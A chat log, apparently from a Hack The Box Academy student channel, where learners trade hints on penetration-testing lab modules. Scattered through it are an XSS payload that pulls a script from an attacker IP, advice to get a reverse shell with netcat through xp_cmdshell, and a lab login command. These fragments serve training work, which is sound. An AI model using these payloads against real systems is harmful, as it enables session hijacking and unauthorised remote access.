That's been the general move to do

🤘

I don't recall if anyone was able to mount it

On a linux

i was thinking about that, but i thought it could be possible through linux

I bet it is, but is the juice worth the squeeze?

It's possible but probably something stupid simple that's overlooked

Whereas open windows system, do thing is easier

¯_(ツ)_/¯

fair enough, i will do it on a windows box

did u solve it?

What module and section is that?

https://academy.hackthebox.com/module/191/section/2055 HTTP Attacks. log injection. bypass <>

I forget what I did, just tried a few things and no luck 😦

mb u know where i can read about <> filter bypass? all of \u and % encoding doesn't works. thats really confusing

The question is not about bypassing filters @worthy pagoda

So you need to adjust your approach. See the pop-up notification you get when visiting the website and you shall find the way

u mean cookie value true?) ok, got it

Absolutely not.

Just abuse the form fields

Hello, is there someone that I can message to help me better understand why something works on the "AD Skills Assessment 2" please? It has to do with capturing credentials, but I don't want to spoil it.

I'm honestly not quite sure why it works either but I'd be interested in your ideas. I also have a working theory myself but dunno if it's true. feel free to dm me 🙂

Thank you that'd be great! I dmed you.

It's not misleading: the section does not tell you at all to assume that the last line before the exercise has to do anything with the section's question, it's your own whims.

Also, delete the parts of your message that spoil the question. You are giving away the answer as you can guess.

I'm willing to bet that over 90% of people doing the exercise are trying to bypass the WAF when they start because of that line. You continuously argue with me instead of take people's recommendations on how to improve the labs.

The section is named "LOG INJECTION," and it explains how to carry out LOG INJECTIONS, and then you go to BYPASS WAFs (filters). Something does not add up.

I am not arguing, just responding to your messages.

The labs are sometimes throwing curve balls, so it wouldn't be a stretch to assume that they want you to bypass the WAF by encoding the special characters, especially since thats' the last idea that's planted into our mind as we finish reading the section

misunderstanding arises because of this: "In a real-world setting, filters may be in place that we need to bypass.". when i read this, first thing that comes to mind is WAF. in my case ofc

Yes you need to bypass the WAF in place but not focus on filters very strongly.

In real world engagements thats what happens. You have to be creative to be successful when it comes to pentesting. Don't expect uniform patterns.

its not this module problem, some of modules exactly saying to u, what need to do, but another don't say that and sometimes just get confuse to you, sometimes it's not so obvious) btw this module really good and more like real life

Wait until you get to response splitting, if you can finish it let me know because I'm still stuck. The rest, including the final assessment is straightforward

oK!

Trying to mount the NFSSHARE from NFS - Foothold module. I got this error. Anyone has an hint? It works well when I try to mount the "nfs" share, but I have issue for the second question with "nfsshare"

No pain No gain 😉

change first nfsshare to nfs?

thats the name of the share, not the share type

ohhh gotcha! Thank you

also try not to post flags

Yes I'll remove

Any languages I should know before starting?

familiarity with linux and bash in general will help. python is a bonus. the rest will come in time. academy does a pretty good job of slow rolling you into it. just PLEASE dont start in the middle.

Okie thank you!!

I am still battling this, I thought I had it figured out, but it has me edit the htb/fatty/shared/resources/User.java down towards the end of the section. It says to modify the code and shows what to modify. My question is I see two places in the User.java file that look like is where I should modify it. I am a bit confused if I should delete everything in that file and replace it with the code it shows, or just modify one to both places that have the public User(int uid, String username, String password <snip-->) etc? Hopefully my question makes some sense.. Thanks!

If anyone else has some insight on Exploiting Web Vulnerabilities in Thick-Client Applications in the Attacking Common Application module for the above question I would love some help. Thanks!

Yeah, that was annoying to follow in an example. I believe ||its the one that has less in it. I think that's the second one||, but I'd need to look at the Java to be sure.

I mean.. you could literally try changing both, and see what happens 🙂

Ok I tried the top one but deleted everything between that and the second one (made it into one statement.) I will try one at a time, Thanks!

In the Linux Fundamentals course, in the File Descriptors and Redirections section, the question asks "How many total packages are installed on the target system?". Could someone please explain what exactly I am meant to be looking for please? Is it a specific type of file extension?

at the risk of overexplaining, every "program" you install within linux consists of one or more packages. this could be application functionality or base-OS functionality. there is a command you can run that lists out the currently installed packages. remember that there is more than one package manager in linux world, so make sure youre using the command for the right one for the target OS. This command may or may not display the number right there; cant remember, but there is another command that you could redirect output to somehow that can count the output.

I finally found out how to answer the question, basically I was using the wrong command (||apt instead of dpkg||) and wasn't using the correct filters but after watching a video I was able to understand what I was being asked to do in the question better... Thank you for attempting to help me but in all honesty it was a video that helped by spoon feeding me the way to do it that helped, which I didn't really want to do

As your post is almost a month-old, really hopeful you solved it... but if you haven't, feel free to DM.

I tried both spots now and still get a login failure, I'm sure I am messing up some part of it but have no idea really what at this point...

Are you using their example username?

I can log in as QTC with the default password fine, it is the SQL part that fails, if that is what you mean

Hey
I am stuck at the Attacking Common Services Module at the SQL section. Enumerate the "flagDB" database and submit a flag as your answer. I already tried things like ||impersonation (but there is no one to impersonate). I also tried just using the the flagDB database but I have no rights. I cracked the password in the task before but I don't know how to use it. I also tried searching for remote databases but also no luck.|| Can someone give me a little push into the right direction ?

That should work.

Just ||log into the db with the new creds. Same way you probably did for question 1.||

weird also tried that. I will try again

Yeah it says login failed

What you might not be doing is ||copying the modified java file into the new package||. The commands you are given, ||only copy files from the folder with the first files they get you to modify||. So it ends up with the original code.

Only thing else I can think of without looking at the question again is that you are using ||the wrong username. You're meant to be using the service account. You may need to explicitly identify it with .\\ at the beginning.||

Hmm good point, let me try again...!

@pine dagger
always getting the same error with the other account as well. IDK why that happens. Maybe you know

(Thats the default account given in the exercise)

Thats not the account that you cracked the password for.

yeah I know

But I wanted to post the command I used. I just replaced it with the default account so I don't spoil stuff

The other one gives the same error

Well, I'd have to redo it to confirm, but that's what I have in my notes.

weird maybe sqsh is broken ?

I used mssqlclient.py for the other sutff

vi

ls

@pine dagger Got it. It wanted ||-windows-auth||. Though sqsh still isn't working. At least I got the task with mssqlclient.py now

Hi @plucky rover ! I'm blocked at the same question. Could you provide me some help?

is vpn shit today? ive tried us1 and us2 also pwnbox going so slow its unusable

In the FOOTPRINTING Module (DNS), I have issue with this question. I tried many combination of "dig" and never found the correct answer. From my understanding the FQDN is [hostname].[domain].[TLD], so I'm looking for an answer of that format, but could not find the answer.

For the AD enum & Attacks assessment pt 1, I’m unable to answer question 2….I was able to get a reverse shell, but for some reason can’t upload any tools and use them….whenever I try to upload them via the feature in the web shell, it doesn’t actually work. Anyone else have this problem?

Yeah you are right with the FQDN its something like www.google.com

Can you send me what you tried via DM ?

Because if you played around with dig you should have found it by now and I guess you just have some minor mistake

For Password Attacks > Credential Hunting in Linux, does anyone know the intended way without using the hint? I don't see how I was supposed to get it without the pass from the hint.

Unable to find the upload path for file upload skill assessment. Anyone able to help?

Is there a way to press the windows key to get a powershell prompt while in xfreerdp? Using macOS > to the parrotOS instance > windows box.

It should work normally. DM me

Hey, is this for the flag question? Feel free to DM me. I'm working on this module rn as well.

Use the provided resources from the resource zip file

hello guys i am stuck on linux fundamental ,file system, What is the size in GiB of the "/dev/vda" disk in our Pwnbox? (Format: 000)
can anybody help? please?

I believe the command is lsblk

wait let me try

boom

ur a king man

thank u

i was suffering for 2 days lol i finish all only this one stuck

https://www.howtouselinux.com/post/linux-list-disks

But the correct pass is a mutation of the one given in the hint and its not in the password.list file

hi , i am doing Kerberoasting - from Linux section from ACTIVE DIRECTORY ENUMERATION & ATTACKS module and i have issue with GetUserSPNs.py script is askingo for password

If anybody experiences difficulties with the US VPN's, always try switching to EU. For some reason US rarely works for me.

can I ask question regarding SQLMap Essential Attack Tune module?

I found a flag but seems like it doesn't work 😦

There is a custom.rule used to mutate the password.list

can i get a nudge for the CBBH session hijacking part of the XSS module? i cannot get any payloads to work (i don't see any traffic being made to my local server from the target), and i'm at a loss for what i'm doing wrong

Starting point 1 is not avalible at the moment?

will starting point 2 work the same

@ me pls

if answer

This isn't the place to ask about starting point #rules #welcome that will show you how to get access to other parts of the server

sudo fdisk -l

ah thanks

mb

Hoping you already solved this, but if you're still stuck on it, DM me.

Hi guys, I am stuck on SeTakeOwnershipPrivilege section from WINDOWS PRIVILEGE ESCALATION module.
My issue is that whoami /priv does not include either enabled or disabled SeTakeOwnershipPrivilege with the htb_student rdp account.
Did I miss some steps to access the privileges? The post mentioned SharpGPOAbuse but there seems no instructions with it.

Hi, I just started and am excited to learn! However I'm not sure what I am doing on this module. https://academy.hackthebox.com/module/35/section/219
It says to get the flag. I think I did what it asked of me, I used the target ip with /download.php
After that I am not sure where or what I am supposed to be doing to get the flag.

Thanks, I could finish it by that time , what a great module, wasn’t it?

that should be the answer, try to specify the method for the request.

@burnt sluice thanks, i was just a dumby and didnt realize I was looking at the answer 💀

This one wasn't correct i tried it

Anw i got my answer thank u

hey guys quick question

for nmap enumerating, the module mentions that the nmap connect scan is the most stealthy way of determining the state of a port

but on nmap documentation nmap says that the most stealthy way isn't -sT (connect) but -sS (TCP-SYN)?

This is the most basic form of TCP scanning. The connect() system call provided by your operating system is used to open a connection to every interesting port on the machine. If the port is listening, connect() will succeed, oth erwise the port isn’t reachable. One strong advantage to this technique is that you don’t need any special privileges. Any user on most UNIX boxes is free to use this call.

This sort of scan is easily detectable as target host logs will show a bunch of connection and error messages for the services which accept() the connection just to have it immediately shut- down. This is the default scan type for unprivileged users.``` <- from nmap docs

The Connect scan is useful because it is the most accurate way to determine the state of a port, and it is also the most stealthy. Unlike other types of scans, such as the SYN scan, the Connect scan does not leave any unfinished connections or unsent packets on the target host, which makes it less likely to be detected by intrusion detection systems (IDS) or intrusion prevention systems (IPS). <<-- from HTB

anybody able to provide any clarity on that?

from what i've read, with -sS the TCP packet flow is SYN-SYN/ACK - RST which means the handshake never completes

however with -sT it performs a proper handshake (SYN - SYN/ACK - ACK) which actually establishes a connection

so surely the server would notice the connect scan as opposed to the TCP-SYN scan?

Footprinitng SNMP
Q) Enumerate the custom script that is running on the system and submit its output as the answer.

Any hints?

In order to enumerate SPNs you need domain user credentials. That's what it's asking you for

Dm me what you've tried so far

hello i need help

i cant connect hackthebox vpn with kalilinux

Done

Elaborate further

?

how do i connect ut

sudo openvpn <directory to .ovpn file>

did you solve the challenge ? if not, I can give you some hints

Hello everyone?
Are HTB writeups prohibited? For example if you write a walk through without revealing the the flags, is that prohibited?

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

Thanks mate

#prolabs-dante

Hello everyone.
I need help with the Port Forwarding with Windows Netsh part of the Port forwarding and pivoting module.
I can rdp to the pivot but I don't have admin rights to run netsh.exe. Can someone give me a tip on how to do the privilege escalation here?

hey, am in Windows Priv Esc PILLAGING, i got the SAM and SYSTEM files, i used samdump and impacket-secretdump and got the hashes and but nothing seems to be working for the Admin hash as the correct answer, can someone give me a heads up on what i might be doing wrong?

There are a few snapshots, you will have to find the one that will work

Hint: Take into consideration the time and the paths

eg the latest?

¯_(ツ)_/¯

fair thanks for the info

give me a sec, because i retrieved them and dumping them offline

I can't remember and I don't have my notes here at the moment. However I may sound silly but did you check your user permission? When you right click on CMD or PS "run as administrator" asks you to insert a passwd?

thanks

yup, it worked. Thanks a bunch!

I need help with the Active directory enumeration & attacks skill assessment II

hey, stuck on this as well, would you be able to give me a nudge?

can we earn cubes without passing by modules ?

#welcome

I believe not, only when you complete a module 100%

I think you can buy them. Check this out:
https://academy.hackthebox.com/billing

Sad im stuck with a bit less than 50cubes
Didn’t find anyway to grow that number 🤦‍♂️
Every cheapest module is 10cubes but it only reward me 10 so im not growing 🥲
Or i misunderstood something

Yeah ive seen this thx

You can buy cubes or when you complete a question (by some, you will earn cubes too)

Any experts of John here or at least know it well enough to mentor?

hey

is it legal to hack one of my own emails?

depends what you mean with hack and email I guess

like if i send a phising attack to one of my other emails

<@&861185840277487616>

....

check the description of this bot

PYTHON AI DEVELOPER

Pretty sure that should be fine as long as you control all the email accounts. The problem only arises if you try to bruteforce passwords of an external email provider because you are effectively attacking their infra

Well i am not a bot

oh okey thanks

Still no lawyer so be cautious 😄

haha yes

xD

Can someone help me with the nessus assessment, the 172.16.16.100 ip doesn't seem to work

Which module is it ? @slate shell If its Vulnerability Assessment you can DM me

It'll be a bit of time before can help, but send me a dm

hello guy, how is it going? I'm so stuck on the first brute force Skills Assessment. I easily succeeded with the first flag but for the second am going mental. Can anyone help?

What did you try? If you think its to spoiler heavy dm me

alright

Hi guys, let me know if someone else is available for a little help, please

Hello, I need help completing the Blind SSRF module in hack the box

http://dontasktoask.com

This isn't the place for prolabs #rules #welcome

If you read you'll see that in order to access other channels you need to verify your HTB account here.

In #bot-commands

Second: it's rude to just randomly @ or reply to people

gm everyone

Module: Shells & Payloads
Section: The Live Engagement
Question: Connectivity Issues

Description: I'm having issues connecting to the foothold host for the Live Engagement. Attempts to SSH or RDP into the host with the provided credentials result in connection time out errors, connection failed, or connection refused.

Im using a VM with the VPN key. Ive tried redownloading the VPN file. No success with a refreshed key. Same results from the pwnbox. Any help is muchly appreciated.

Module:Cracking Passwords with Hashcat
Question:Cracking Common Hashes
hi i have tried most of rules but i cant find it can u give me a hint

Did you try pinging the box? Do you get a response?

I did not, but I just ran it. Ping is good.

Edit: Correction, sort of?? I tried ping again and got 100% packet loss.

Possible suggestion for the HTB Team --

I am working through the "Attacking Common Services - Easy Lab" -- in the "Resources" there is a user list and a password list. These lists are used throughout the module for attacks require a bruteforce. In addition, the user list is used in the lab to discover the correct username.

Nevertheless, to find the password, you then have to switch to the "rockyou.txt" wordlist (which I learned after too much experimentation to figure out what I am missing). If the module provides a user/password list --- but there is a part that requires a different list --- please provide this information. The constant experimentation with random wordlists does not help the student learn the bruteforcing process. In the real world, pentesters generally have standard wordlists they use (or wordlists that are discovered through enumeration on the target domain) and bruteforcing is done via high-end "cracking" machines or renting cloud machines.

Randomly experimenting with wordlists, especially when it's unclear at best, leads to frustration -- not learning.

Of course, all in my opinion so take it with a grant of salt 🙂 always a good chance I am missing something HTB team is trying to accomplish!

Are you using xfreerdp? Make sure there’s no spaces in between “/v:<ip>”, etc

Triple checked syntax, target ip, username, password:

xfreerdp /v:10.129.126.213 /u:htb-student /p:HTB_@cademy_stdnt!

That looks good to me, if you’re getting inconsistent ping responses try resetting the box, maybe turn off your firewall if you have one running (shouldn’t mess with outgoing connections but idk)

Yeah, I reset the target host a couple times, redownloaded the VPN file, tried accessing from the pwnbox...nada.

use 'HTB_@cademy_stdnt!' in quotes

Just tried.

──(kali㉿kali)-[~/Kali_Host]
└─$ xfreerdp /v:10.129.126.213 /u:htb-student /p:'HTB_@cademy_stdnt!'
[10:59:30:523] [74259:74260] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[10:59:30:523] [74259:74260] [ERROR][com.freerdp.core] - failed to connect to 10.129.126.213

hmm, can you ping that ip ? @small steppe

Yup.

hmmm that's weird. I would reset the machine

Ive done that. Atleast twice.

Which module is this, I can try it myself in 5-10 mins ; )

Are you using tcp or udp vpn key?

udp

Module: Shells and Payloads
Section: The Live Engagement

udp

try to switch to TCP

cool! I will try myself in a bit.

If you have time I was working on this last night and got very stuck on box 2 in the live assessment 😅

This worked. I swear -- its always the smallest things...

hahaha lol! I had such times too 😂

Muchly appreciated -- I was throwing myself at the wall over this.

aww sure! I have done all the modules. You can dm me for nudges

Thanks! I’m at work now so I can’t try anything until later. But for reference I was trying to run the metasploit module that’s hinted at on the blog site, kept getting “Exploit failed: NoMethodError undefined method `split’ for nil:NilClass”

hmmm that's a weird erorr.. well pm me after work 😁

🙏

I can help if youre still stuck, dm

Hello! Can anybode give me the Payload for the Cross-site scripting / session hijacking part? Ranning out of ideas ..

The payload of which stage?

The exercise is based on the material, so if you have understood the material you can use it in your advantage

I used the same payload as other people (who showed it here) but its not working "><script src=http://OUR_IP></script>

I can assure you it works

unluckily not in my case, where did you enter it?

i used every input field

Take a break, and rethink

getting no response in my php server

already did a few times

pls tell me what to do next

All that you need to solve it is within the material of the section

Can you be a bit more precise?

can't be more precise on that mate

Bro your tip is not more than "check your material" :/

Yes, because everything you need to solve it is in it

then for what is this academy-chat, everything is solvable with the knowledge from htb

its about getting stuck and helping others out, nvmd

Agree, however, you are asking for the payload directly and not a specific question

which makes me think, that you don't want to bother much on troubleshooting it why it is not working, but rather just to have a working one from someone else

hey guys how do i start solving a challenge?

No its not that i am to lazy to test things out, i already tried some payloads from hacktricks and the six listed in the section, set up my php server and waited for a response, but nothing came back

Check how the web page is filtering your XSS payload.

The ip i entered is also correct, checked that several times

break the things in to multiple pieces, pick one and try if it works and if it does move onto the next one

You can't simply copy + paste stuff.. each websites filters the XSS payload slightly differently. By advise; open inspect element, and verify how your payload is being filtered on the webpage.

ok i guess you want me to check the hijacking/scripts.js

guys

do i have to connect hackthebox vpn everytime i am opening it again?

Honstly, no clue where i could find a filter or smth

Check your payload and how the website is processing it

How can i see how the backend is processing it? I cant find any frontend processing except the email-regex and the empty-check

with php the backend code is abstracted away and processed on the sever only. it then returns to you html or files that have been processed.
the whole point of the module youre on is to throw stuff at the inputs methodically.
if your server isnt getting responses, maybe youre trying the wrong input. maybe your server command is incorrect.

"can i get the answer" isnt a good way to learn. explain what you did, explain whats wrong, and ask for a hint. users are are much more apt to respond to someone who shows that they tried.

I set up a php server on port 80, got my ip via ip a and entered the 6 payloads from the module. I am getting no response on my server altough i checked the correctness of my entered url and made sure my payload was correct

what was the server command you used?
are you sure that youre targeting your tun0 ip?
maybe the port is filtered, needs to be changed, or needs to be called out to directly.

Checking that later, thx

Did you solve this by any chance?

How you going with the easy lab?
Get any shells to work.. I'm stuckkk

Hey guys, having a tough time with question 7 of the AD Enumeration & Attacks - Skills Assessment Pt 2….I was able to get a mssql session going….but xp_cmdshell doesn’t give much other than a headache lol.
Any nudges?

@wanton mica Are you able to execute xp_cmdshell?

I did! And I finished it. I'll DM you.

Yeah, if you can execute xp_cmdshell -- you have full RCE on the system. Think of how to upload a shell to get a better foothold. Feel free to DM me for help.

Another suggestion to HTB staff (and other students who might be stuck) -- The "Attacking Common Services - Medium" lab is supposed to have 6 services come up (based on the forums). I have restarted the target twice so far, waited 5+ minutes for my scan, and nmap -p- scan is still only returning 4 services. No way I would know that I am missing the main services without reading the forum. It may be helpful to add a note on the number of services that SHOULD be exposed, and that some students have reported issues seeing all the services.

I am on to rebooting the target for the 3rd time to see if I can finally get the services to start.

yeah, it takes a few resets and a couple of minutes of waiting for that port and service to work

Yeah... that's frustrating to say the least 😂 -- It would be helpful to have a note as a "Hint" with that information. I only spent a little time enumerating the services, before checking the forums after realizing something seemed off.

For anyone who reads this in the future, it took me 5 restarts...

Session Security skills assessment. How do we even start that? Like are we supposed to guess the admin email? should it be obvious? is it necessary? I've done every other exercise in the module but don't get how im supposed to approach this one. It seems like every other exercise i had known victim and attacker credentials.

hello, can somebody provide me with a bit of a sanity check pls?

module: ACTIVE DIRECTORY ENUMERATION & ATTACKS
section: AD Enumeration & Attacks - Skills Assessment Part II

Q: I have system priv on ||SQL01|| and know that i need to get the pass for ||mssqlsvc|| but i cant crack the ntlm hash and the password i get from tools seems to still be partially encrypted? i know it has something to do with ||Sup3rS3cur3...|| but im not getting its cleartext version only something similar to this (but with the actual password inside)||;.6.b.u.^.u.r.;.m.J.&.E.S.&.#.I.u.).C.Q.Z.e.c.k.||
How should I figure out what the actual, full pass is?

||You can still authenticate as a user without their cleartext password||

i was so focused on getting the pass that i did not think of this.. thanks 🙂

Module: Shells & Payloads
Section: The Live Engagement
Question: Host 2 - Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt.

So, I have my exploit in MSF and I set the options. Exploit returns an error (see image). I did some searching on the Discord and it looks like I'm doing everything appropriately -- unclear why I'm getting this error. Any ideas?

Edit: Resolved.

Yeah I was able to do that via xp_cmdshell (‘xp_cmdshell dir’ for example’

Will do….just gave me an idea

well, you are able to execute commands as behalf of the system ; ), Try to execute ||nc64.exe||

Then enumerate from there

OMG WHY DIDN’T I THINK OF THIS…lol thanks!

hahah no worries 😁 get a full-interactive shell. It's windows, I would use: ||rlwrap nc -lnvp <port>||

Hello am generating a reverse_tcp on dll file, am running the dll and i am geting a connection on my machine but no reverse shell. Is something that i need to be careful of?
Nevermind :}

I have finally completed HTTP Attacks module, it was painful and I contemplated my existence many times, but it's done now. If anyone ever stumbles upon this, you can message me for hints, so you don't have to lose your mind like I did

hey guys
i have a problem to solve skill assessment the "File upload" module
any body can help me?

i understand all of step and solve them but have a problem in last step (get the flag)

Hey there ! I have a question :
The exams : " HTB Certified Penetration Testing Specialist " if i buy a ticket. i dont give me access to all modules ? they just give me two tickets to take an exam?

(sry idk if its the right channel)

can anyone help with a nudge on file uploads skills assessment?

i'm pretty close

pm me

pm me

afaik yes

ok thx

hmmm

Make sure you're using the right callback ip in the LHOST

The ticket is just for exam

has anyone successfully installed BIND9 on their local parrot os VM?

fpr the footprinting module

*for

You don't really need to install bind for it

Why are you installing bind?

wanna follow alongf

and do the same

to test

there is a dependency conflict however when I try to install it

Then install the dependency

¯_(ツ)_/¯

atm I am doing Footprinting -> Oracle TNS -> I receive the following error. Does someone has a solution for it? bash ┌──[🛡️ f0rk] └──╼[🔥]/opt/blackbuntu/odat $ sqlplus scott/tiger@10.129.205.19/XE; sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory ┌──[🛡️ f0rk] └──╼[🔥]/opt/blackbuntu/odat $ sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
bind9 : Depends: bind9-libs (= 1:9.16.37-1~deb11u1) but 1:9.18.12-1~bpo11+1 is to be installed
E: Unable to correct problems, you have held broken packages.

it's prob a weird edge case sorta thing but like I said. It's not needed and a lot of the 'follow along' isn't too important. ¯_(ツ)_/¯

hi guys, any pointers on the username injection task in broken auth module? just getting passwords don't match? - nevermind. for some reason the server bugged. reset and tried again and it worked, love wasting time !!

If you do the troubleshoot step from the section it should work

Nope.. I following the troubleshoot step

But it's not working

I'd also suggest adding the odat to your $PATH

For some reason it doesn't like to add it to path

But I didn't really have any issues with it not working (fully up-to-date parrotOS)

hmm

┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ export LD_LIBRARY_PATH=/usr/bin/sqlplus:$LD_LIBRARY_PATH
┌──[🛡️ f0rk]
└──╼[🔥]/opt/blackbuntu/odat $ sqlplus scott/tiger@10.129.205.19/XE;
sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory

¯_(ツ)_/¯

got it

I had to add this: export LD_LIBRARY_PATH=/usr/lib/oracle/21/client64/lib:$LD_LIBRARY_PATH

Thanks to chatGPT ❤️

¯_(ツ)_/¯

If it works it works

yUP HAHA

I just followed the script they provided

I did too..

I am using Blackbuntu tho

as in copy pasted to a file then chmod +x ¯_(ツ)_/¯

I did that too

Weird then

well I did: sudo bash <script>.sh

it's the same tho

Only issue I had was the predic

aww okay

I have trouble too

I've got troubles in my File Upload module ^^'

If someone already finished this module ^^'

Can I chat with someone about the answer for the SMB module and what the full path of the share is? Its not accepting my answers and I am not sure why.

Sure dm me

Hint: convert windows to linux

Iirc

I have a question related to AD enum & attacks skills assessment 2…

How the hell is everyone able to use ||PrintSpoofer||? I’ve tried compiling it on both windows and Linux and it just won’t work…and for some reason I can’t install winegcc

Can anyone help me with the DNS section on the Footprinting lesson? I have no idea what to do. I tried using Dig and DNSEnum, but I couldn’t get the answer for any of the questions, I don’t really understand what to do

Did you check the zone transfer?

I tried that by using dig with AXFR, I saw a few text entries but I didn’t know what to do with that

I tried digging the subdomains I got but I couldn’t get anything else either

It is said that we often times have to look…ummm….internally to solve our problems….we have to dig internally…nawmsayn?

Don’t really understand

Read your axfr results

Any further hints would basically spoil it

Yes…what Master Marcie said

As far as the octet of x.x.x.203, subdomains of subdomains

Hi i m new here

Wait which problem are you guys talking about?

Don't know anything

Pls help

I was looking at the second one with txt

Feom where i have to atart

Start

DNS footprinting

Yeah but which problem on that section

Doing a zone transfer to one of the subdomains gives you the text record

So I would use dig to get AXFR on one of the subdomains?

Yes

Ah I see I got it

I really don’t understand DNS I have such trouble understanding it 😭

The section kinda goes over it a fair bit

I’m also having trouble with the FQDN… wouldn’t the FQDN of inlanefreight.htb just be
http://inlanefreight.htb

Nope

Oh I guess not because it’s not a web server huh

Well... Not necessarily

Inlanefreight.htb is just the domain name

Are website FQDN’s and DNS FQDN’s two different things?

no

https://www.hostinger.com/tutorials/fqdn?ppc_campaign=google_search_generic_hosting_all&bidkw=defaultkeyword&lo=1026320&gclid=CjwKCAjw__ihBhADEiwAXEazJjVYeU4BQUPN-OwyUxGO8iPuyNah-QYjs3Huj72Gq4Lzxnlcq9l2oxoC7uUQAvD_BwE

so a FQDN specifies the full domain name for a specific instance, the domain name is just like the root of it

fqdn = hostname + domain name

aka. hackthebox.com would be the domain name. academy.hackthebox.com would be the fqdn for academy

i'm on my last module and i've made it most of the way through. I'm stuck at the user.java part in the fatty client. i've overwritten the two sections the chapter discusses, but I'm still not able to get qtc' or the sql string to bypass auth for me. anybody have any pointers?

Ohh, but if it asks for just one FQDN, how do I know which subdomain to choose?

Read the question carefully

Because I got several such as mail1, ns, app, dev, internal, root

It's asking you the fqdn of a specific thing

Ah, I’ll check again in a bit I have to go to a different class now

hey guys
does anyone know how to rub commands like osintgram and aircrack-ng or hydra
because most of the people put these contents on youtube but they don’t explain it with more details

most of the videos on social media also doesn’t tell you exactly how

they just tell you what is used for but they don’t tell you exactly how to do it or they don’t explain much about

man tool

doesnt sound module relevant

read #rules and #welcome

There is a module related to aircrack iirc

But yeah their phrasing indicates they're just watching a video

guys i know man or help commands but i some places u have to specify a file or it should be done through root
most of the youtubers don’t tell you that

i've recompiled the fatty.server and gone through all the source code with jd-gui

Ok this is really getting off topic since you can't read

thats cool, maybe read #rules or #welcome and you'll find a relevant channel to ask in.

thx guys i think i was just a noob to ask here

its not about being a noob or not, this just isnt the correct place.

but for some reason when I move user.java over to the raw folder and recompile the java app, launch traverse.jar it fails to log me in with qtc'

And you're being pointed to the correct place

If you fucking read

😮

I've heard this one is a pain I'm not looking forward to it

Getting spicy

https://tenor.com/view/thriller-michael-jackson-eating-popcorn-watching-gif-5577709